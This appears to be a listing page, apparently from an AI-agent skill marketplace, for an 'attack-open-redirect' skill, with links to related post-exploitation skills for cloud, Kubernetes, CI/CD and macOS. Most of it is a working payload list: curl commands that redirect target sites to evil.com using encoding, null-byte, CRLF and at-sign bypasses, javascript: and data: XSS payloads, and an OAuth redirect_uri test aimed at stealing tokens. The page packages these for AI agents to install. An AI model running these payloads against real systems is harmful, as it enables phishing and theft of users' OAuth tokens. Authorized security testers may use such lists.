بنقرة واحدة
attack-open-redirect
Open redirect exploitation — URL parameter manipulation, OAuth token theft, phishing chains
التثبيت باستخدام Codex أو Claude انسخ هذا Prompt والصقه في Codex أو Claude أو مساعد آخر ليراجع صفحة Skill ويثبّتها لك.
القائمة
Open redirect exploitation — URL parameter manipulation, OAuth token theft, phishing chains
التثبيت باستخدام Codex أو Claude انسخ هذا Prompt والصقه في Codex أو Claude أو مساعد آخر ليراجع صفحة Skill ويثبّتها لك.
استنادا إلى تصنيف SOC المهني
eBPF-based post-exploitation for kernel-level credential harvesting, process hiding, and traffic interception on Linux
AWS post-exploitation for IAM privilege escalation, data exfiltration, persistence, and operational security via boto3
Azure/Entra ID post-exploitation for tenant compromise, Key Vault extraction, managed identity abuse, and token manipulation
CI/CD pipeline attacks for secret extraction, pipeline injection, and supply chain compromise via GitHub/Jenkins/GitLab
Kubernetes post-exploitation for container escape, secret extraction, RBAC abuse, and cluster persistence
macOS post-exploitation for credential harvesting, DTrace monitoring, TCC bypass, and stealth operations via native tools
| name | attack-open-redirect |
| description | Open redirect exploitation — URL parameter manipulation, OAuth token theft, phishing chains |
| category | web-application |
| version | 1.0 |
| author | cyberstrike-official |
| tags | ["open-redirect","web","phishing","oauth","attack"] |
| tech_stack | ["web"] |
| cwe_ids | ["CWE-601"] |
| chains_with | ["attack-cors","attack-jwt"] |
| prerequisites | [] |
| severity_boost | {"attack-jwt":"Open redirect + OAuth = JWT/token theft"} |
Exploit URL redirect parameters to redirect users to attacker-controlled domains, steal OAuth tokens, or bypass security controls.
Common parameter names:
url, redirect, redirect_url, redirect_uri, return, return_url, returnTo,
next, goto, target, dest, destination, rurl, redir, forward, continue,
callback, path, out, view, login_url, image_url, go, link, ref
# Direct redirect
curl -s -D- "https://TARGET/redirect?url=https://evil.com"
# Protocol-relative
curl -s -D- "https://TARGET/redirect?url=//evil.com"
# Encoded
curl -s -D- "https://TARGET/redirect?url=https%3A%2F%2Fevil.com"
# Backslash bypass
curl -s -D- "https://TARGET/redirect?url=https://evil.com\@TARGET"
# At-sign bypass
curl -s -D- "https://TARGET/redirect?url=https://TARGET@evil.com"
# Subdomain matching
curl -s -D- "https://TARGET/redirect?url=https://TARGET.evil.com"
# URL encoding tricks
curl -s -D- "https://TARGET/redirect?url=https://evil.com%23.TARGET"
# Double encoding
curl -s -D- "https://TARGET/redirect?url=https://%65%76%69%6c.com"
# Null byte
curl -s -D- "https://TARGET/redirect?url=https://evil.com%00.TARGET"
# CRLF + Location header
curl -s -D- "https://TARGET/redirect?url=%0d%0aLocation:%20https://evil.com"
# JavaScript scheme
curl -s -D- "https://TARGET/redirect?url=javascript:alert(document.domain)"
# Data URI
curl -s -D- "https://TARGET/redirect?url=data:text/html,<script>alert(1)</script>"
# Test with OAuth tester
attack_script oauth_tester "https://TARGET/oauth/authorize" \
--client-id CLIENT_ID \
--redirect-uri "https://TARGET/callback" \
--json-output
If redirect_uri accepts attacker domain, the OAuth code/token is sent to the attacker.
| Finding | Severity |
|---|---|
| Open redirect + OAuth token theft | Critical (P1) |
| Open redirect in login/auth flow | High (P2) |
| Generic open redirect | Medium (P3) |
| JavaScript scheme redirect (XSS) | High (P2) |
attack_script oauth_tester — OAuth redirect_uri bypass testingcurl — manual redirect testing